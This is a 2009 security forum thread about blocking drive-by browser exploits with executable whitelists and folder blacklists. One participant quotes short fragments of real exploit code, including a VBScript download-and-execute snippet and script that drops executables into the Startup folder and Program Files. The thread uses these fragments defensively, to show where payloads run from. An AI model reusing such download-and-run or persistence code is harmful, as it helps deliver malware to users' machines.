Whitelist ( folder and files ) , Blacklist ( folders)

Discussion in 'other anti-malware software' started by Joeythedude, Apr 21, 2009.

Thread Status:
Not open for further replies.
  1. Joeythedude

    Joeythedude Registered Member

    Joined:
    Apr 19, 2007
    Posts:
    519
    Hi

    I'm interested in opinions on this system.
    Its designed with 2 aims in mind.
    1) To avoid drive-bys, browser exploits , which attempt to run an undetected exe file.
    As far as I can see these try and run in the brower cache or system temp files.
    2) To be able to add/remove programs without changing the set-up in any way.

    2 Steps
    1) Whitelist - Will allow all exe in these folders and this specific exe file
    C:\
    C:\Firefox Installation\Firefox.exe


    2) Blacklist - Will deny all exe in these folders , unless explict path given in whitelist ( as for firefox above)
    C:\Firefox Installation
    C:\TEMP (& any other Temp folders)


    Prog to enforce this list is called trust-no-exe

    What vunerabilties am I missing ?
    The only one I can see if the malware copies itself to someplace other than in the blacklist.
    This seem to be very uncommon in exploits I've read of so far.


    P.S & Please don't turn it into a discussion on using sandboxie and LUA etc :)
     
    Last edited: Apr 21, 2009
  2. Thankful

    Thankful Savings Monitor

    Joined:
    Feb 28, 2005
    Posts:
    3,739
    Location:
    New York City
    This program appears to be the precursor to a program called ExeLockdown.
    There are threads discussing the shortfalls of ExeLockdown as compared to Faronics AntiExecutable. AntiExecutable used to be a terrific program until Faronics destroyed it with version 3.
    By the way, this should be listed in 'other anti-malware software' section.
     
    Last edited: Apr 21, 2009
  3. Joeythedude

    Joeythedude Registered Member

    Joined:
    Apr 19, 2007
    Posts:
    519
    I've had a look at both those programs & Threads.
    AE v2 would allow a similar functionality , I would have to turn it off to add a program though.

    This setup will allow me to add and remove programs without any
    doing anything , and yet stop a lot of internet threats.

    The idea here is to block internet threats. What % do people think it would catch ?
     
  4. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    That's a bit harsh! It's still an effective program but just less user-friendly for the average home user. It's for that reason mainly, that I no longer recommend it.

    It's evident from the Faronics literature that they are directing their efforts almost exclusively to institutions. Not a bad marketing decision when you think about it. Administrators can tailor the White List for specific user environments. For user accounts, it is still Default-Deny.

    I applaud Faronics for keeping this restriction; it makes for a bullet-proof barrier in the average home where only the parent can install something. As you make a security product less restrictive, you provide a potential weakness that a clever person can exploit.

    A similar criticism is made of Faronics' Deep Freeze, where you have to reboot/thaw before making changes. Yes, an extra step and time if you do this a lot, but I appreciate the reboot first, knowing that the system has returned to its previous good state before any changes can be made/saved.

    Tthe only way to be sure is to test!

    One example: The malware could run from C:\ .

    Here is a web exploit I use to test. I'll download astroexp.xyz, copy it to C:\ as astro.exe and execute it:

    Code:
    OOOOOOOOOOOOOwwwwwww ="http://...../astroexp.xyz"
    fname2= F.BuildPath("C:\","astro.exe")
    Q.ShellExecute fname2,
    
    astro-runC.gif

    This is not malware, but a small self-contained program which doesn't write to %System% or the Registry. It could have been a password stealer that connects out to another server.

    This is true, but since you've mentioned White Listing, for the most bullet-proof protection, I want something that watches (White Lists) the entire HD drive to prevent *any* unauthorized executable from executing from *any* location.

    astro-blockC.gif

    I would feel more comfortable with this setup. I'll agree that this is a "potential" vulnerability. It's true that files cache to the temp locations by default, but this test shows that it's possible for code to specify the download directory.

    ----
    rich
     
  5. Joeythedude

    Joeythedude Registered Member

    Joined:
    Apr 19, 2007
    Posts:
    519
    Thanks for those points.

    Its true the exploit can go to say the C:\ drive and run there in this setup.

    But if say even 50% of the browser exploits can be caught with just this, I'd be very pleased with it.
    It would have no impact on me at all :) , and yet reduce my risks by that amount!

    Remus, I think you've done a lot of testing of exploits , do you remember if many tried to run themselves outside the browser cache or temp folder ?

    J
     
  6. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    A quick look found three. They cache the malware executable and copy it to another location to run.

    Executable runs from the user's Startup folder

    The user is redirected from a Google link to a malware site, whereupon the exploit code executes:

    Code:
    dstart=obj_WScript.SpecialFolders("Startup");
    daustart+"\\Update_0802_KB072103.exe";
    
    [​IMG]

    Executable runs from %Windir% Program Files

    njvj-IE.gif

    Executable runs from Program Files

    The code shows the exploit searching for available directories:

    Code:
    mycars[0] = "c:/Program Files/wsv.exe";
    var mycars = new Array();
    mycars[0] = "c:/Program Files/wsv.exe";
    mycars[1] = "d:/Program Files/wsv.exe";
    mycars[2] = "e:/Program Files/wsv.exe";
    mycars[3] = "C:/Documents and Settings/All Users/..../Thunder.exe";
    mycars[4] = "C:/Documents and Settings/All Users/
    Start Menu/ Programs/ Startup/ Thunder.exe";
    
    [​IMG]

    Realizing that you are using Firefox, since all known browser exploits in the wild target IE, you are pretty much immune from this type of attack. Likewise, I've never gotten any of these to run in Opera.

    ----
    rich
     
  7. Joeythedude

    Joeythedude Registered Member

    Joined:
    Apr 19, 2007
    Posts:
    519
    v interesting. I guess some just take the location from the windows system/variables ( i.e %temp% ) , and then other's just hardcode stuff like program files , cause it has to be there !

    Will have a little re-think , thought I had found a holy gail of protection without any side-effects.

    I thought there had been FF exploits, didn't know only IE was being used in the wild.

    Although Matt ( remove-malware.com) only used IE ... 6 .... :D
     
    Last edited: Apr 21, 2009
  8. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Note that I said FF is "pretty much immune." That leaves me some wiggle room in case something surfaces to exploit FF in the wild!

    Many vulnerabilities, of course but these are usually patched quickly before they can become exploits out there.

    However there is nothing wrong with having a fail-safe barrier to block the running of the executable payload in case another barrier (browser in this case) is compromised.

    Think of exploits that target applications/plugins. Should they load in the browser (prevented by configuring in the browser) as in the recent PDF exploit, the executable will run (assuming an unpatched version of the PDF reader).

    Many assumptions and barriers to get past!

    I've not seen enough of these to predict, but the 2 I've gotten to work both run the executable from the browser cache, so your setup takes care of that. So far...


    ----
    rich
     
  9. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    5,633
    Location:
    U.S.A. (South)
    I'm glad i'm still on XP Pro because Faronic's AE2 is bulletproof and it's restrictions are second to none IMO for such an app as this as Rmus has pointed out time and time again with his generous screenshots and commentary/views. Some apps almost defy Logic or reason but in reality ar very well constructed for optimum protection, this is exactly as i view DEEP FREEZE & AE2.

    EASTER
     
Loading...
Thread Status:
Not open for further replies.